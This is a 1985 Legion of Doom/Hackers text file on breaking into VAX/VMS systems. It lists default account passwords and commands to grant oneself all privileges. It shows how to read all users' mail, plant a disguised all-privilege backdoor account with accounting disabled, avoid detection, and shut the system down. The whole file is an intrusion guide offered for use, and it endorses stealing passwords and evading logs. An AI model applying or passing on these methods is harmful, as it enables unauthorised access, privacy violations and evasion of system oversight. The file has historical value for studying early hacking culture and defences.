

$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
L                                   L
O            Lex Luthor             O
D               and                 D
$    The Legion Of Doom/Hackers     $
L            Present:               L
O       HACKING VAX'S VMS           O
D                                   D
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
L                                   L
O This file will list most  default O
D accounts/passwords,  commands for D
$ non-privileged accts and commands $
L for privileged accounts,  how  to L
O set up your own acct,  list users O
D and how to shut down the  system. D
$                                   $
LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$L
O  (C)    WRITTEN 10-APR-85         O
D  Written by:  LOD/H               D
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$




INTRODUCTION:
-------------

   The VAX is  made by DEC  (Digital Equipment Corp)  and can run a  variety  of
operating  systems.  In this file,  I will  talk about  the VMS  (Virtual Memory
Operating System), VMS.  The VAX is a 32 bit machine with 32 bit virtual address
space.

ENTRANCE:
---------

   When you first connect with  a VAX you type either  a return, a ctrl-c, or  a
ctrl-y.  It will then respond with something similar to:

LOD/H NETWORK COMMUNICATIONS RESEARCH SYSTEM VMS V4.0

Username:
Password:


   The  most frequent way of  gaining access to a computer  system is by using a
'default' login/password. In this  example you may try  LOD as the username  and
RESEARCH  as the  password or  a combination of words  in the opening banner (if
there is one) which  may allow you  access, otherwise you will  have to try  the
DEFAULT METHOD of entry.  The version listed above (V4.0) is the latest  version
to my knowledge of VMS.  The more widely used version that I have seen is V3.7.

   When DEC sells a VAX/VMS, the system comes equiped with 4 accounts which are:

DEFAULT -- This serves as a template  in creating user records in the UAF  (User
Authorization  File). A new  user record is  assigned the values  of the DEFAULT
record except where the system manager changes those values.  The DEFAULT record
can be modified but cannot be deleted from the UAF.

SYSTEM  --  Provides  a  means  for  the system  manager  to  log  in  with full
privileges. The SYSTEM  record can be  modified but cannot  be deleted from  the
UAF.

FIELD -- Permits DIGITAL field service personnel to check out a new system.  The
FIELD record can be deleted once the system is installed.

SYSTEST -- Provides an appropriate environment for running the User  Environment
Test  Package  (UETP). The  SYSTEST record  can  be deleted  once the  system is
installed.

   Usually the SYSTEM MANAGER  adds, deletes, and  modifies these records  which
are in the UAF when the system arrives, thus, eliminating the default passwords,
but this is not true in all cases.

   The 'default' passwords that I have found to get me into a system are:

Username:    Password:
---------    ---------
SYSTEM       MANAGER or OPERATOR
FIELD        SERVICE or TEST
DEFAULT      USER or DEFUALT
SYSTEST      UETP or SYSTEST

   Other typical VMS accounts are:

VAX          VAX
VMS          VMS
DCL          DCL
DEMO         DEMO
TEST         TEST
HELP         HELP
NEWS         NEWS
GUEST        GUEST
GAMES        GAMES
DECNET       DECNET

   Or a combination  of the various  usernames and passwords.  If none of  these
get  you in, then you should move on to the next system unless you have a way to
get usernames/passwords, like from trashing, stealing passwords directly, or  by
some other means.

YOUR IN!
--------

   You will know that you are in by  recieving the prompt of a dollar sign  '$'.
You will be popped into the default directory which is dependent on what account
you are logged in as.  If you get in as the system manager, you have full access
if  you get in  on the field  or systest accounts  you may or  may not have full
access but you will have  the privileges to give  yourself full access. To  give
privs to yourself:

$ SET PROCESS /PRIVS=ALL

   Once you have full privs, you can access any directory and any file, and also
run the AUTHORIZE pgm which will be explained.

   The VMS system has full help files available by typing HELP. You can use  the
wildcard character of an '*' to list out info on every command:

$ HELP *

   When  you first logon, it may be to your advantage to get a list of all users
currently logged onto the system if there are any at all.  You can do this by:

$ SHOW USERS

VAX/VMS Interactive Users - Total = 4
     01-MAY-1985 11:37:21.73

OPA0:         DEMO         004C004C
TTD2:         LAWRENCL     0059004A
TXB1:         FIELD        008D004E
TXB3:         TWYLYSYS     01190057


   It  is highly recommended that if you are  logged on in the day and there are
people logged in, especially the system manager or the account you are logged on
as, logout and call back later.  I have found that no matter what system you are
on, the best way to remain undetected is  to call when no one is on the  system.
You do not want to call too late since the system keeps a record of when each
user logs in and out.

   To communicate with other users or other  hackers that you are on the  system
with, use the PHONE Utility.

$ PHONE Username


   If the system has DEC-net, you can see what available nodes there are by:

$ SHOW NETWORK

   If you have mail the system will tell you so after logging in, simply type:

$ MAIL

   This will invoke the Personal Mail Utility, you can use help from there.

   There are a  lot of  commands and  many are not  too useful,  (to the  hacker
anyway),  so I will not go into detail.  One thing about VMS, there is plenty of
on-line help  available which  will enable  you to  learn the  operating  system
fairly well.

DIRECTORIES:
------------


   To see what you have in your directory type:

$ DIR

   To get a list of directories on the system type:

$ DIR <*.*>

   When a VAX/VMS is first installed,  it comes with nine directories which  are
not listed when you execute the DIR <*.*> command:

<SYSLIB>
   This directory contains various macro and object libraries.

<SYSMSG>
   This directory contains system message files.

<SYSMGR>
   This directory contains files used in managing the operating system.

<SYSHLP>
   This directory contains text files and help libraries for the HELP utility.

<SYSERR>
   This is the directory for the error log file (ERRLOG.SYS).

<SYSTEST>
   This  directory contains files used in testing the functions of the operating
system.

<SYSMAINT>
   This diectory contains system diagnostic programs.

<SYSUPD>
   This directory contains files used in applying system updates.

<SYSUPD.EXAMPLES>
   This directory contains sample driver programs, user-written system services,
and other source programs.

<SYSEXE>
   This directory contains the executable images of most of the functions of the
operating system.

   Inside these directories are files with the following file-types:




File-type ! Description:     ! Command:
----------+------------------+-------------------------------------------------
 .txt     ! Ascii text file  ! TYPE file-name
 .hlp     ! System Help file ! TYPE file-name
 .dat     ! Data file        ! TYPE file-name
 .msg     ! Message file     ! TYPE file-name
 .doc     ! Documentation    ! TYPE file-name
 .log     ! Log file         ! TYPE file-name
 .err     ! Error msg file   ! TYPE file-name
 .seq     ! Sequential file  ! TYPE file-name
 .sys     ! System file      ! FILE-NAME
 .exe     ! Executable file  ! FILE-NAME
 .com     ! Command file     ! COMMAND NAME
 .bas     ! Basic file       ! RUN file-name
----------+------------------+-------------------------------------------------

   There are others but you won't see them as much as the above.  You can change
directories either  by using  the CHANGE  command or  by using  the SET  DEFAULT
command:

$ CHANGE <DIR.NAM>
                          or
$ SET DEFAULT <DIR.NAM>

   You can now list and execute the files in this directory without first typing
the directory name  followed by the  file name  as long as  you have  sufficient
access.  If you  don't have  sufficient access you  can still  view files within
directories that you cannot default to by:

$ TYPE <LOD.DIR>LOD.MAI;1

   This will  list  the contents  of  the file  LOD.MAI;1  in the  directory  of
<LOD.DIR>.

   The use of wildcards is very helpful when you desire to view, all the mail or
something on a system.  To list out all the users mail if you have access type:

$ TYPE <*.*>*.MAI;*

   As you may notice mail files have the extension of MAI at the end.  The ;1 or
;2 etc.  are used to number files with the same name.

PRIVILEGES
-----------

   Privileges fall into seven categories according  to the damage that the  user
possessing them could cause the system:

None   - No privileges
Normal - Minimum privileges to effectively use the system
Group  - Potential to interfere with members of the same group
Devour - Potential to devour noncritical system-wide resources
System - Potential to interfere with normal system operation
File   - Potential to compromise file security
All    - Potential to control the system (hehe)


THE UAF
-------

   The  User Authorization File contains the names of users who may log into the
system and also contains a record of  the user's privileges. Each record in  the
UAF includes the following:

1. Name and Password
2. User Identification Code (UIC) -- Identifies a user by a group number and a
   member number.
3. Default file specification -- Has the default device and directory names for
   file access.
4. Login command file -- Names a command procedure to be executed automatically
   at login time.
5. Login flags -- Allows the system manager to inhibit the use of the CTRL-Y
   function, and lock user passwords.
6. Priority -- Specifies the base priority of the process created by the user at
   login time.
7. Resources -- Limits the system resources the user may perform.
8. Privileges -- Limits activities the user may perform.

   If you have SYSTEM MANAGER privileges, you will be able to add, delete, and
modify records in the UAF.

   The AUTHORIZE Utility allows you to modify the information in the UAF.  It is
usually found in the <SYSEXE> directory.  The commands for AUTHORIZE are: ADD

username <qualifier..>  Adds a record to the UAF
EXIT (or CTRL-Z)            Returns you to command level
HELP                        Lists the AUTHORIZE commands
LIST <userspec> </FULL>     Creates a listing file of UAF records
MODIFY username             Modifies a record
REMOVE username             Deletes a record
SHOW                        Displays UAF records

   The most useful besides ADD is the SHOW command.  SHOW displays reports for
selected UAF records.  You can get a /BRIEF listing or a /FULL listing.  But
before you do that, you may want to make sure no one is logged on besides you.
And to make sure no one can log on, you do this by:

$ SET LOGINS /INTERACTIVE=0

   This establishes the maximum number of users able to log in to the system,
this command does not effect users currently logged on.  I never do the above
since it is not really needed and looks very suspicious.  Now, to list out the
userfile do the following:

$ SET DEFAULT <SYSEXE>
$ RUN AUTHORIZE
UAF> SHOW * /BRIEF

Owner           Username     UIC     Account  Privs  Priority  Default Directory

SYSTEM MANAGER  SYSTEM    <001,004>  SYSTEM   All       4      SYS$SYSROOT:
FIELD SERVICE   FIELD     <001,010>  FIELD    All       4      SYS$SYSROOT:

   To get a full report:

(if you used the SET DEFAULT cmd earlier and the default dir is the <SYSEXE>
directory, then you don't have to re-type it).

$ RUN AUTHORIZE (or if you still have the UAF> prompt):
UAF> SHOW * /FULL

Username:  SYSTEM             Owner:  SYSTEM MANGER
Account:   SYSTEM             UIC:    <001,004>
CLI:       DCL                LGICMD:
Default Device: SYS$ROOT:
Default Directory: <SYSMGR>
Login Flags:
Primary days:   Mon Tue Wed Thu Fri
Secondary days:                     Sat Sun
No hourly restrictions
PRIO:     4  BYTLM:         20480  BIOLM:            12
PRCLM:   10  PBYTLM:            0  DIOLM:            12
ASTLM:   20  WSDEFAULT:       150  FILLM:            20
ENQLM:   20  WSQUOTA:         350  SHRFILLM:          0
TQELM:   20  WSECTENT:       1024  CPU:        no limit
MAXJOBS:  0  MAXACCTJOBS:       0  PGFLQUOTA:    200000
Privileges:
  CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG-IO GROUP ACNT PRMCEB
  PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD OPER EXQUOTA NETMBX VOLPRO PHY-IO
  BUGCHK PRMGBL SYSGBL MOUNT  PFNMAP SHMEM SYSPRV SYSCLK

UAF>

   Unfortunately, you cannot get a listing of passwords, though, you can get the
list of users as shown above.  The passwords are encrypted just like a UNIX
system, but you cannot even see the encrypted password unless you look at the
actual file that the UAF> draws it's information from.

   After listing out all the users, you figure that since all these other people
are on here, why can't I have my own account? Well, if you have sufficient
privs, you can!

UAF>ADD SYSLOG /PASSWORD=LEGION /UIC=<014,006> /CPUTIME=0 /DEVICE=SYS$SYSROOT-
-/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL /OWNER=DIGITAL /NOACCOUNTING


1) You ADD the username SYSLOG (you do not want to create a user like: Lex,
   since it will be too obvious and not look right.  I have had much success in
   not being detected with this acct.
2) You specify the password for the SYSLOG account.
3) You assign a UIC (User Ident Code) which consists of two numbers in the range
   of 0 through 377, separated by a comma and enclosed in brackets.  The system
   assigns a UIC to a detached process created for the user at login time.  User
   processes pass on this UIC to any subprocesses they create. Processes can
   further assign UICs to files, mailboxes, devices, etc.  You can assign the
   same UIC to more than 1 user.
4) CPUTIME is in delta format, 0 means INFINITE, which is what we will use.
5) You specify the DEVICE that is allocated to the user when they login, which
   for our purposes, is the SYS$SYSROOT device, other devices are: SYS$DEVICE,
   SYS$SYSDISK, DB1, etc.
6) Specifying an account is not necessary, but if you do, use one that is listed
   as another users', since you don't want to attract too much attention to the
   account.
7) The default directory can be a directory currently on the system or it can be
   created after the UAF record is added.  You may want to use one of the ones
   mentioned earlier in the file, but be sure not to use the <SYSMGR> directory.
8) You can select one of the privileges listed earlier in this file, we will
   use, of course, ALL.
9) OWNER is similar to the ACCOUNT qualifier, again, look at what the other
   users have listed.
10)NOACCOUNTING will disable system accounting records, thus, not adding
   information to the ACCOUNTING.DAT file.


   After the UAF record is successfully added, you should create a directory by
specifying the device name, directory name, and UIC of the UAF record.
Protection for the "ordinary" user is normally, Read, Write, Execute, and Delete
access for system, owner, and group processes, and read and execute access for
world processes.  To create a directory:

$ CREATE SYS$SYSROOT:<SYSLOG> /DIRECTORY /OWNER-UIC=<014,006>


ACCOUNTING:
-----------

   For accounting purposes, the VAX/VMS system keeps records of the use of the
system resources.  These records are kept in the accounting log file:
SYS$SYSDISK:<SYSMGR>ACCOUNTING.DAT, which is updated each time an accountable
process terminates, each time a print job is completed and each time a login
failure occurs.  In addition, users can send messages to be inserted into the
accounting log file.

To surpress the accounting function and thus avoid accounting for the use of
system resources requires privilege.  The /NOACCOUNTING qualifier is used to
disable all accounting in a created process.

   You may want to see how often the account you are using or another account
logs in, you can do this by:

$ ACCOUNTING /USER=(SYSLOG)

  Date / Time         Type     Subtype      Username  ID        Source  Status
------------------------------------------------------------------------------
30-JAN-1985 00:20:56  PROCESS  INTERACTIVE  SYSLOG    000000C5  NONE    00038090
12-FEB-1985 04:11:34  PROCESS  INTERACTIVE  SYSLOG    000000A9  NONE    00038110
01-MAY-1985 10:40:22  PROCESS  INTERACTIVE  SYSLOG    000000C4  NONE    00030001

   This is the accounting information for the user:SYSLOG which shows that the
user has logged on three times so far.  Some users may be on hundreds of times,
thus, it would be an ideal account to use/abuse since it will not be likely that
the unauthorize accesses will be detected.

LOGGING OFF:
------------

   Simply type:

$ LOGOUT

   The system will display the usual CPU time used and other statistics.

SHUTTING DOWN THE SYSTEM:
-------------------------

   Many files I have read tell you how to destroy a system, shut it down etc.  I
do not recommend nor practice any type of malicious activities.  Though, I do
realize that in the process of gaining access to a system, the Hacker or System
Cracker which ever you prefer, gets bored or learns as much as he wants to learn
about the system.  I will explain how to shutdown the system correctly, this can
be used in case you think you screwed the system and shutting down the system
may be the only way to avoid considerable damage.

   The normal reasons for shutting down the system are: danger of power loss,
need to backup the system disk, hardware or software problems, or to use the
system for a specific application.  Below is the command procedure which
describes how to shut down the system in an orderly fashion.  This procedure is
contained in a command file.

PROCEDURE:

1) Type the following command to begin the shutdown procedure:

   $ @SYS$SYSTEM:SHUTDOWN

2) Enter time till shutdown:

   How many minutes until shutdown?:5

3) You will now have to give the reason for shutting it down:

   Reason?:possible system damage

4) Respond to typing a Y or N to the following question:

   Do you want to spin down the disks?:N

After a short period the message:

SYSTEM SHUTDOWN COMPLETE - USE CONSOLE TO HALT SYSTEM

At this point, the system cannot be totally shut down, but all processes are
halted, thus, not causing any further damage to the system. (remember the reason
you should have shut it down was because potential damage to the system could
have occured and you were acting in the best interest of the system) yeah sure.

READING MATERIAL:
-----------------

   For general background information about the VAX/VMS system, see the VAX/VMS
Primer and the VAX/VMS Summary Description and Glossary.  The following VAX/VMS
documents may also be useful:

 o VAX/VMS Command Language User's Guide
 o VAX/VMS Guide to Using Command Procedures
 o VAX/VMS Release notes
 o VAX-11  RSX-11M User's Guide
 o VAX-11  Software Installation Guide
 o VAX/VMS System Manager's Guide
 o VAX/VMS System Messages and Recovery Procedures Manual
 o VAX-11  Utilities Reference Manual
 o RMS-11  User's Guide

   For controlling network operations, refer to the DECNET-VAX System Manager's
Guide.

Lex Luthor
Legion Of Hackers!

                                                                                    